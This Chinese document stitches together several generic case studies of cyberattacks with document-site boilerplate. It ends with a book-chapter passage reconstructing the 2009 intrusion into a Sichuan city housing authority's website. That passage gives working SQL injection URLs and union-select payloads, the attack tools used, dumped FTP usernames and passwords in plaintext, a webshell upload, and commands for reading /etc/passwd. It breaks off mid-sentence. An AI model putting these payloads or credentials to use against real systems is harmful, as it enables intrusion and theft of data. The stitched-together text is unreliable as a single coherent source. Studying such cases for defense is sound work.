服务器被入侵案例分析
网络侵权行为案例分析
网络侵权行为案例分析网络侵权行为案例分析:黑客攻击导致数据泄露时间:2008年3月10日至2008年4月15日事件细节:2008年3月10日,一家知名电子商务公司“X公司”(下称X公司)的网络系统遭到了一次有组织的黑客攻击。
该公司很快意识到自己的客户数据可能已经被窃取,随即启动了一个紧急调查程序,并在3月12日发现了确凿的证据表明数据被黑客窃取。
黑客通过利用X公司系统的漏洞成功登录了X公司的服务器,并窃取了逾60,000名客户的个人信息,包括姓名、地址、电话号码、电子邮件地址以及部分信用卡号码等敏感信息。
黑客窃取的个人信息涉及的客户来自全球范围,包括美国、欧洲和亚洲等地。
X公司在发现泄露后立即采取了多项措施以应对此次安全漏洞。
他们立即停止了服务器的运行,并在调查过程中雇佣了网络安全专家进行系统检测和修复。
X公司还与执法机构合作,提供了相关调查所需的信息。
调查表明,黑客组织使用了多种高级技术手段来获取非法访问权限。
他们先是通过一次钓鱼攻击获得了一名X公司员工的登录信息,然后利用该员工的帐户访问了X公司的服务器。
一旦黑客获取了入侵服务器的权限,他们利用服务器内的漏洞,逐步扩大了对系统的访问权限。
黑客组织对窃取的个人信息进行了拍卖,其中一部分被用于进行恶意欺诈活动。
受害者中有不少人在该诈骗行动中被骗几千美元。
律师的点评:这起案件涉及黑客攻击和个人信息泄露,严重侵犯了X公司客户的隐私权。
根据现行法律,黑客攻击属于非法侵入计算机信息系统罪,而泄露个人信息则构成了侵犯公民个人信息罪。
对于X公司而言,他们的安全系统在遭到攻击前可能存在一些疏漏,因此公司应该要承担一定的责任。
然而,X公司在发现问题后迅速采取了应对措施,包括停止服务器运行、雇佣网络安全专家进行修复,并积极与执法机构合作。
这些举措显示了公司的积极负责的态度。
对于黑客组织成员,一旦被抓获,将面临刑事指控和刑罚,根据不同国家的法律,刑罚可能包括几年到十几年的有期徒刑。
网络安全案例中的漏洞分析与修复建议
网络安全案例中的漏洞分析与修复建议在当今数字化的时代,网络安全已成为了至关重要的问题。
各种网络攻击事件层出不穷,给个人、企业乃至国家都带来了巨大的损失。
本文将通过分析一些典型的网络安全案例,深入探讨其中的漏洞,并提出相应的修复建议。
一、案例一:某企业数据库遭入侵某大型企业的数据库在一次网络攻击中被入侵,大量的客户信息和商业机密被窃取。
经过调查发现,攻击者利用了该企业网络系统中的一个未及时修补的漏洞。
这个漏洞存在于企业所使用的一款老旧的服务器软件中,由于长时间未进行更新,导致被攻击者发现并利用。
漏洞分析:1、软件版本过旧:企业未能及时更新服务器软件,使其存在已知的安全漏洞,为攻击者提供了可乘之机。
2、缺乏定期的安全检测:企业没有建立有效的安全检测机制,无法及时发现系统中的漏洞和潜在威胁。
修复建议:1、及时更新软件:定期检查和更新所有使用的软件,包括操作系统、服务器软件、应用程序等,确保使用的是最新且安全的版本。
2、建立安全检测制度:制定定期的安全检测计划,使用专业的安全检测工具,对网络系统进行全面的扫描和检测,及时发现并处理漏洞。
二、案例二:某网站遭 SQL 注入攻击一家知名网站遭到了 SQL 注入攻击,导致网站数据被篡改,用户无法正常访问。
经过分析,发现是网站的开发人员在编写代码时,没有对用户输入的数据进行严格的验证和过滤。
漏洞分析:1、代码编写不规范:开发人员在处理用户输入数据时,没有采取有效的防范措施,使得攻击者能够通过构造恶意的 SQL 语句来执行非法操作。
2、缺乏安全意识培训:开发团队对网络安全的重视程度不够,缺乏相关的安全意识培训,导致在开发过程中留下了安全隐患。
修复建议:1、规范代码编写:对开发人员进行培训,使其掌握安全的编程规范,在处理用户输入数据时进行严格的验证和过滤,防止 SQL 注入等攻击。
2、加强安全意识培训:定期组织开发团队参加网络安全培训,提高他们对网络安全的认识和重视程度,从源头上减少安全漏洞的产生。
企业网络安全案例分析
企业网络安全案例分析近年来,企业面临日益复杂的网络安全威胁,以下是一些企业网络安全案例分析,通过分析这些案例,可以有效了解企业网络安全的挑战以及应对策略。
案例一:泄露客户数据的事件某电子商务公司的服务器遭到黑客攻击,导致客户数据泄露。
黑客通过网络漏洞入侵了服务器,并窃取了包含用户个人信息的数据库。
该企业搭建了防火墙和入侵检测系统,但未及时更新补丁和修复漏洞,给黑客留下了可乘之机。
解决方案:1. 及时更新补丁和修复漏洞:企业应确保软件和系统及时更新最新的安全补丁,修复已知的漏洞。
2. 强化网络安全意识:进行网络安全培训,教育员工避免在不安全的网络环境下使用公司网络,加强密码管理等。
案例二:勒索软件攻击事件某制造业公司的电脑系统遭到勒索软件攻击。
黑客通过钓鱼邮件发送了一个恶意附件,一旦受害人打开附件,勒索软件就会在受害人电脑上加密文件并要求赎金。
这导致企业的生产系统瘫痪,造成巨大经济损失。
解决方案:1. 员工安全意识培训:提高员工对钓鱼邮件等网络威胁的警惕性,教育员工不轻易打开陌生邮件或下载未知软件。
2. 周期性备份数据:保持重要数据的备份,并将备份文件存储在离线环境中,以防止勒索软件对备份文件的破坏。
案例三:内部员工攻击事件一位企业的内部员工出于不满,窃取了公司机密信息并出售给竞争对手。
这导致企业的商业计划和客户数据外泄,造成了严重的商誉损失。
解决方案:1. 限制员工访问权限:为员工设置合适的权限和访问控制,限制敏感信息的访问,并应定期审查权限设置,确保权限与职位一致。
2. 实施员工行为监控:使用员工行为分析工具来监控和检测异常行为,及时发现潜在的内部威胁。
通过对以上案例的分析,企业可以从中吸取教训,采取相应的网络安全措施,提升企业的网络安全能力。
网络安全是一项持续的工作,企业需要不断更新安全措施,与不断进化的威胁作斗争。
黑客犯罪案例分析报告
黑客犯罪案例分析报告一、引言随着信息技术的迅速发展和互联网的广泛应用,黑客犯罪正逐渐成为一个全球性的问题。
黑客犯罪不仅给个人、组织和企业带来了巨大的经济损失,还对国家的网络安全和社会稳定构成了严重威胁。
本报告将对近年来发生的几起典型黑客犯罪案例进行深入分析,以期帮助人们更好地认识黑客犯罪的危害性和防范措施。
二、黑客犯罪案例一:某银行黑客攻击事件某银行是国内知名银行,拥有庞大的客户群体和海量的交易数据。
在某年某月,该银行突然遭到黑客攻击,导致其网络系统瘫痪长达数小时。
黑客通过入侵银行的服务器,窃取了大量客户的个人信息,包括账号、密码、身份证号等。
随后,黑客将这些信息出售给了盗取资金的犯罪团伙,导致数百名客户在不知情的情况下被盗取了资金。
分析:该案例显示了黑客犯罪的重要特点,即黑客入侵服务器窃取客户信息,然后将其利用于实施其他犯罪活动。
这种类型的黑客犯罪不仅给受害者带来直接的经济损失,还对个人隐私和金融安全带来了极大的威胁。
因此,金融机构应加强网络安全防范,加强服务器保护,提高客户信息的安全性。
三、黑客犯罪案例二:某政府部门数据库被黑客攻击某国家政府部门拥有大量的敏感信息,包括国内外重要人物的个人资料、国家机密等。
然而,在某次黑客攻击事件中,该政府部门的数据库遭到黑客入侵,导致大量敏感信息泄露。
这给国家安全带来了严重的威胁,也使得国家形象受到了巨大的损害。
分析:该案例表明黑客犯罪已经不再是个人行为,而是威胁国家安全的重要因素。
政府机构应意识到网络安全的重要性,加强网络防范和入侵检测系统的建设,加强对数据库的加密和权限管理,提高国家信息的保密性和安全性。
四、黑客犯罪案例三:某大型企业的内部黑客攻击事件某大型企业是市场领导者,拥有庞大的客户群体和重要商业机密。
然而,在一次黑客攻击事件中,该企业内部职员将企业的商业机密卖给了竞争对手。
这不仅使得该企业在市场上失去竞争优势,还导致巨额经济损失。
分析:该案例显示了内部黑客攻击所带来的威胁,这种类型的黑客犯罪对各类企业造成了巨大的经济损失。
网络安全案例及分析
网络安全案例及分析1. 政府机关遭受黑客攻击某国家的重要政府机关遭受了一系列黑客攻击,导致机关内部信息被泄露。
黑客通过利用机关内部网络系统存在的漏洞,成功入侵了该机关的数据库,并窃取了敏感信息。
此次攻击对国家安全产生了重大威胁,损害了政府的公信力。
分析:- 漏洞利用:黑客能够入侵该机关的数据库,说明他们利用了该系统中的漏洞。
这可能是由于机关未及时进行安全更新,或者没有采取足够的安全措施来防范潜在攻击。
- 社会工程学:黑客可能还使用了社会工程学技术,在通过钓鱼邮件或其他方式欺骗机关工作人员提供内部信息或登录凭证。
机关工作人员在对外部信息缺乏警惕性的情况下,被黑客成功获取了访问权限。
- 数据保护:黑客入侵机关数据库并泄露敏感信息表明,机关在数据保护方面存在缺陷。
可能是缺乏足够的数据加密措施,或者未建立严格的访问权限控制。
这导致黑客能够轻易地获取敏感信息,对国家造成了重大威胁。
解决方案:- 漏洞修复和安全更新:机关应立即修复所有已知漏洞,并定期更新网络系统和软件,以确保系统的安全性。
- 员工培训:机关应加强员工的网络安全意识培训,教育员工警惕网络攻击和社会工程学手段。
工作人员应在接收到可疑邮件或要求提供敏感信息时保持警觉,并通过与内部安全团队进行确认来验证其真实性。
- 数据加密和访问权限控制:机关应加强对数据库中敏感信息的加密保护,并仅授权特定人员访问此类信息。
通过建立更加安全的访问权限控制,可以降低黑客获取敏感信息的可能性。
2. 电商网站数据库遭受勒索软件攻击一家知名电商网站的数据库遭到了勒索软件的攻击,导致网站无法正常运行,并需要支付大量赎金才能恢复数据。
用户的个人信息、订单记录等敏感数据也被黑客威胁泄露,这对网站的声誉和用户信任造成了巨大影响。
分析:- 勒索软件:黑客以安装恶意软件的方式进入电商网站的服务器,并通过加密网站数据库的方式将其数据全部锁定。
黑客通过要求支付赎金来解锁数据库,以恢复网站的功能性。
网络安全攻击案例分析
网络安全攻击案例分析随着互联网的普及和发展,网络安全问题日益突出。
各种网络安全攻击事件时有发生,给个人和企业带来了巨大的损失。
本文将通过分析几个网络安全攻击案例,探讨攻击手段、影响以及防范措施,帮助读者更好地了解网络安全问题,并提供一些有效的解决方案。
案例一:DDoS攻击最近,某大型在线游戏平台遭受了严重的DDoS(分布式拒绝服务)攻击。
攻击者通过控制了大量的僵尸主机(被感染的计算机),同时向游戏服务器发送大量的伪造请求,导致正常用户无法访问游戏平台。
这种攻击不仅影响了游戏平台的运营,也给其声誉带来了巨大的损害。
攻击手段分析:DDoS攻击是通过控制大量的僵尸主机,同时向目标服务器发起大规模请求,超出其承载能力的范围,以达到阻断正常用户访问的目的。
攻击者往往通过僵尸网络、恶意软件等方式感染并控制计算机,然后通过操纵这些计算机发起攻击。
影响分析:DDoS攻击会导致目标服务器过载,无法正常处理正常用户的请求。
这不仅会造成服务不可用,还可能导致系统崩溃、数据泄露等严重后果。
同时,被攻击的组织声誉也会受到严重损害,用户对其信任度大幅下降。
防范措施:1. 实施DDoS防御方案:使用DDoS防火墙、入侵检测系统等技术手段,对流量进行监测和过滤,及时发现和阻断异常流量。
2. 增加网络带宽:增加网络带宽可以提高服务器的抗DDoS攻击能力,使其能够更好地处理异常流量。
3. 自动化监控和早期预警系统:建立自动化监控和早期预警系统,及时发现异常流量,并采取相应的阻断和隔离措施。
案例二:钓鱼攻击某银行的用户收到了一条看似真实的电子邮件,称其账户存在异常,并引导用户点击附带的链接进行解决。
用户在点击链接后输入了个人账户信息,结果导致账户被盗。
这是一起典型的钓鱼攻击事件。
攻击手段分析:钓鱼攻击是通过伪装成合法的机构(如银行、电商平台等)发送虚假的电子邮件或信息,引诱用户点击链接并输入敏感信息,从而达到非法获取用户账户信息的目的。
信息系统遭到攻击的案例
信息系统遭到攻击的案例信息系统遭到攻击的案例1. 案例背景介绍2. 攻击事件经过3. 后续处理措施4. 分析与总结1. 案例背景介绍某公司是一家以互联网为主要业务的科技公司,拥有大量用户数据和敏感信息。
为保证数据安全,该公司建立了完善的信息系统,并聘请了专业的安全团队进行安全维护。
然而,在某一天,该公司的信息系统遭到了攻击。
2. 攻击事件经过攻击开始于深夜,黑客通过漏洞入侵了该公司的服务器,并成功获取了大量用户数据和敏感信息。
黑客并未直接篡改数据或者进行勒索,而是选择将这些数据公之于众,并声称要将这些数据卖给其他企业或组织。
随后,在社交媒体上出现了大量关于该公司被黑客攻击的消息,引起了广泛关注。
3. 后续处理措施在发现被攻击后,该公司立即启动应急预案,并成立专门小组进行应对。
首先,他们封锁了所有受影响服务器,并对所有用户进行通知,告知他们可能受到影响并提供相应帮助。
其次,他们追踪黑客的来源和攻击方式,并采取措施防止类似事件再次发生。
最后,该公司与相关部门合作,对黑客进行调查和追捕,并加强了信息安全管理。
4. 分析与总结该事件展示了信息系统安全的重要性。
一旦系统遭到攻击,将会对企业造成巨大损失。
因此,企业需要采取有效的措施保护自己的信息系统。
首先,企业需要加强信息安全意识教育,并定期进行漏洞扫描和风险评估。
其次,企业应该建立完善的安全体系,包括网络安全、数据备份、应急预案等方面。
最后,在出现问题时,企业应该及时启动应急预案,并积极与相关部门合作解决问题。
总之,在今天这个信息化时代,信息安全已经成为了企业不可忽视的重要问题。
只有加强信息安全建设和管理,才能有效保护企业数据和用户隐私,并确保企业长期稳健发展。
网络侵入与黑客攻击案例分析
网络侵入与黑客攻击案例分析随着互联网技术的发展和普及,网络侵入和黑客攻击已成为当前社会安全领域的一大威胁。
本文将以案例分析的方式,探讨网络侵入与黑客攻击的原因、影响和应对措施。
案例一:高等院校数据库被黑客入侵近期,某高等院校的数据库遭到黑客入侵,大量师生个人信息被窃取。
经调查分析,该黑客利用了软件漏洞进入院校的系统,窃取了数据库中的敏感信息。
这起事件给用户造成了严重的辛酸,也给高等院校的网络安全敲响了警钟。
一方面,这起事件的原因是高等院校在信息安全方面的意识和防护措施薄弱。
这可能是因为缺乏对网络安全风险的认识,或者是高等院校未能及时更新软件和补丁,使系统暴露在黑客的攻击范围之内。
另一方面,黑客攻击给个人和社会带来了严重的影响。
个人隐私被曝光可能导致身份盗用、财产损失等问题,而社会机构的信息泄露也给安全环境带来了极大的威胁。
为了应对类似攻击,我们提出以下几点建议:首先,提高信息安全意识。
高等院校应加强师生对网络安全的培训,提高他们的信息安全意识和防范能力。
其次,加大网络安全投入。
高等院校应加大对网络安全的投入力度,更新软件和补丁,建立健全的信息安全防护系统。
最后,加强与安全公司和研究机构的合作。
高等院校应加强与安全公司和研究机构的合作,借助他们的技术和经验提供更强大的安全保障。
案例二:医疗机构遭受勒索软件攻击近期,某医疗机构遭受了勒索软件攻击,导致重要患者数据被加密并勒索赎金。
该事件严重干扰了医疗机构的正常运营,给患者和医务人员带来了极大的困扰。
该事件的原因是医疗机构的网络安全措施不足。
很可能是由于医疗机构的网络和系统缺乏及时的更新和升级,使得勒索软件能够轻易侵入系统,并加密重要数据。
勒索软件攻击不仅会导致服务停滞和数据丢失,还可能使机构声誉受损且承担不必要的经济损失。
为了预防勒索软件攻击,我们提出以下几点建议:首先,定期备份重要数据。
医疗机构应定期备份重要数据,确保在遭遇攻击时能够快速恢复服务。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Chapter开篇案例——四川某市房管局网站服务器内部网络入侵纪实2009年4月26日,四川省某市房产管理局网站服务器遭受黑客入侵,其内部网络服务器也相继被入侵,内网机密信息泄露,造成不可估量的损失。
更为严重的是,网站网页中被植入恶意木马,致使访问政府站点的用户大量密码、银行账号、股票交易账号、游戏账号,甚至是个人隐私泄露,造成了极为严重的后果。
21.1 案例类型及背景信息案例类型:网站服务器引发内部网络遭受入侵。
代表网络:四川省某市房产管理局网站及内部网络服务器群组。
案例背景介绍:在某市房产管理局网站服务器遭受黑客入这一事件被报道之后,四川《天府早报》记者接到一起电话报料,一神秘女子言辞肯定,直指成都太升北路某公司为“黑客”性质(图21-1)。
报料者声称“我们工作在一家成都的公司,我们从事的工作是当黑客,甚至入侵政府网站,为我们自己的网站‘挂马’刷流量!”开篇案例——四川某市房管局网站服务器内部网络入侵纪实21图21-1 《天府早报》收到的黑客报料引出房管局入侵案件记者展开调查发现,这家所谓的网络公司利用黑客入侵技术大量入侵各类网站(包括许多政府网站)进行挂马刷流量等非法操作。
由此揭开一些职业黑客公司的非法交易内幕——而某市房产管理局网站服务器及内部网络遭受入侵,只是其中的一个典型案例而已。
21.2 四川省某市房管局网络入侵案例还原在相关人员协助下,警方还原了黑客入侵攻击某市房产管理局网站(http://www.**)及内部网络的整个过程(图21-2)。
21.2.1 目标分析与方案确定通过扫描网站服务器信息(图21-3),得知网站采用Apache提供Web服务,使用PHP与JSP搭建网站系统程序,网站服务器系统类型为Linux,数据库采用Oracle 11g。
另外,网站服务器开放了SSH 和FTP服务,但是网站进行了访问限制,只允许从内网进行连接,外网IP是无法连接这些敏感端口的。
图21-2 某市的房管局网站图21-3 网站服务器扫描结果由此,确定渗透入侵的第一步方案是从网站的Web脚本入手,这样可能性比较高。
首先检测网站是否存在注入或上传等Web脚本攻击漏洞。
21.2.2 Oracle注入utl_http存储攻击尝试利用各种Web入侵扫描检测工具对网站Web程序进行检测,找到了一个JSP的注入点。
http://www.**/cdfgj/zxwd/index.jsp?p_no=2&msgtp=10000005使用经典的and 1=1(图21-4)与and 1=2(图21-5)法进行手工检测,发现JSP注入漏洞确实存在。
使用注入工具pangolin进行检测,发现这是一个Oracle数据库类型的注入点(图21-6)。
发369大中型网络入侵要案直击与防御现注入点后,现在有两个方法继续扩大入侵。
其一是通过SQL注入点猜解数据库,得到网站管理员密码,进入后台后上传WebShell并进行提权,进而控制网站服务器,并渗透入侵整个网络;第二种方法是通过Oracle数据库的特性,配合UTL_HTTP存储扩展,通过创建Java得到路径,直接反弹shell到服务器内网主机上。
图21-4 and 1=1检测图21-5 and 1=2检测首先,尝试第一种方法,使用注入工具或手工进行猜解,虽然成功地猜解出了网站管理员的密码和账户,但是找不到最关键的后台管理员登录页面。
因此,即使有了网站管理员的密码和账户也没有用,只有使用第二种方法。
利用第二种方法进行UTL_HTTP存储扩展攻击,使用的是Linux Oracle 自动攻击器(图21-7)。
首先连接检测UTL_HTTP 存储扩展,返回信息显示UTL_HTTP存储扩展是可以连接利用的(图21-8)。
图21-6 注入工具pangolin检测结果图21-7 Linux Oracle自动攻击器再进行远程命令运行测试,反回的结果提示失败,UTL_HTTP存储扩展无法执行攻击(图21-9)。
至此,对目标网站的入侵暂时陷入了困境。
21.2.3 链接网站的注入突破有时候直接的攻击无法奏效,采用间接的方图21-8 UTL_HTTP存储扩展可连接利用370开篇案例——四川某市房管局网站服务器内部网络入侵纪实21 法入侵很可能找到网站安全的罩门,达到拐弯入侵的目的。
于是考虑使用旁注入侵的方法。
对目标网站“www.**”的IP地址(125.70.244.108)进行Whois查询,但是发现该IP地址上没有捆绑其他的IP地址。
再看看网站是否还利用了其他网站服务器。
在网站首页上有多个链接,包括“市场信息”、“信用信息”、“住房保障”、“公告通知”等(图21-10),分别连接到以下几个网站。
http://www.**/http://www.fc**/图21-9 无法正常执行远程命令图21-10 服务器群组其他主机在查询到的网站信息中,“www.**”比较大,其对应的IP地址为“125.70.244.104”,因此与目标网站www.**很可能在同一内网中,可从此网站进行突破。
通过扫描发现,在“www.**”网站中有一个投票调查系统,存在着SQL注入攻击漏洞,漏洞的链接如下。
http://www.**/vote/vote.php?sid=14使用and 1=1(图21-11)和and 1=2(图21-12)法进行测试,返回页面的信息不同,确定该链接存在着SQL注入漏洞。
图21-11 and 1=1 图21-12 and 1=2另外,在网站中的多处链接也存在注入漏洞,如下。
http://www.**/buy_house_help.php?rk=5http://cdre.**/infor_type_one.php?typeid=1http://cdre.**/infor_type.php?type=20确定存在注入漏洞后,进行注入攻击猜解管理员用户名与密码。
手工进行如下猜解。
●http://www.**/vote/vote.php?sid=14 order by 5返回正常页面。
●http://www.**/vote/vote.php?sid=14 order by 10页面出错(图21-13)。
http://www.**/vote/vote.php?sid=14 order by 7http://www.**/vote/vote.php?sid=14 order by 8http://www.**/vote/vote.php?sid=14 order by 9以上皆返回正常页面,由此可知字段长度为9,因此执行如下查询。
371大中型网络入侵要案直击与防御http://www.**/vote/vote.php?sid=14 and 1=2 union select 1,2,3,4,5,6,7,8,9 返回页面中显示了数字8和数字2(图21-14),可替换这两处数字查询获得需要的信息。
图21-13 字段数目不正确图21-14 显示数字2和数字8先来查询一下当前连接数据库的用户账号和数据库版本。
http://www.**/vote/vote.php?sid=14 and 1=2 union select 1,user(),3,4,5,6,7, version(),9在原来的数字处,分别显示数据“root@172.29.21.122”和“5.1.35”(图21-15)。
说明数据库服务器的IP地址为172.29.21.122,当前使用root权限连接,数据库版本为MySql 5.1.35。
对于数据库MySql 5.1的注入漏洞,可以直接使用专门针对MySql的注入工具WSI V5.1.25进行攻击猜解。
攻击猜解出了所有数据库表,数据库非常庞大,数据内容很多。
其中数据库“**114_shuangliu”的“user”表中有管理员用户名和密码数据,用户名为“admin”,密码采用了MD5加密,密文为“d5a*****e217e60b4348d2b5916fbdec”(图21-16)。
由于密码暴力破解需要很长的时间,因此只有另寻它途。
图21-15 返回数据库信息图21-16 注入猜解管理员账号、密码21.2.4 数据库截获FTP账号,上传WebShell后门在工具猜解列表中发现有名为“**114_ftp”的数据库,从名称中可知此数据库很可能保存了FTP账号密码。
猜解完成后打开记录文件,得到3个账号(图21-17)。
^$|**114|fc35579^$|cdre|cdre!#%&*^$|temp|123456372开篇案例——四川某市房管局网站服务器内部网络入侵纪实21 直接用其中第一个账号连接登录www.**的FTP服务(图21-18),即可上传一个PHP木马文件,获得一个WebShell(http://www.**/WebShell.php)(图21-19)。
图21-17 读取账号信息图21-18 登录服务器连接上WebShell后,进入“shell命令”功能模块,执行“id”命令,返回如下信息(图21-20)。
uid=501(www) gid=501(www) groups=501(www) context=system_u:system_r:initrc_t图21-19 获得WebShell 图21-20 返回信息查看当前用户信息,可知不具备root权限,再执行如下命令。
uname –a查看系统内核版本,返回如下信息。
Linux localhost.localdomain 2.6.18-128.el5PAE #1 SMP Wed Dec 17 12:02:33 EST 2008 i686i686 i386 GNU/Linux由此可知为2.6内核.18版本。
因为WebShell是Web用户权限,权限有限,因此不能做太多的事情,因此可考虑提取“etc/passwd”中的密码。
用刚才的MySql注入工具WSI中的一个读文件“Read file”功能,读入“../../../etc/passwd”文件,返回信息如下(图21-21)。
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/sync在“passwd”文件中,口令字段被使用一个“x”来代替,证明在该内核的Linux系统中,口令不再直接保存在“passwd”文件中,将/etc/shadow作为真正的口令文件,用于保存包括个人373大中型网络入侵要案直击与防御口令在内的数据。